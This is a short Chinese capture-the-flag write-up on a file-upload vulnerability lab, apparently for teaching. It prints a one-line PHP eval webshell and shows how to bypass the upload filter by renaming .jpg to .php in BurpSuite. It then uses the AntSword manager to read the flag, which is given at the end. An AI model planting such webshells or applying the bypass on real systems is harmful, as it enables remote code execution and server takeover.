题目
分析
根据题目可知该题考查文件上传漏洞。
用 BurpSuite 的内置浏览器打开环境。
新建记事本编写一句话木马脚本:
<?php @eval($_POST['r00ts']);?>
保存为 jpg 格式。
打开拦截,上传脚本。拦截到数据包:
将脚本后缀名更改为 php 后放行:
打开中国蚁剑并初始化,在数据管理模块右击新建数据,根据上传成功的路径更改 url,密码为一句话木马设定的内容:
双击条目进入系统文件列表,查找 flag:
在 /var/www/html 目录下发现 flag.php:
双击条目打开文件,得到 flag:
Flag
cyberpeace{8ef7383e44cc4b892db667d6d8430377}
参考
文件上传漏洞 (上传知识点、题型总结大全-upload靶场全解)-Fasthand_-CSDN
PHP 代码审计-CTF Wiki
PHP eval() 函数-菜鸟教程
中国蚁剑(AntSword)安装、使用教程-丶没胡子的猫-CSDN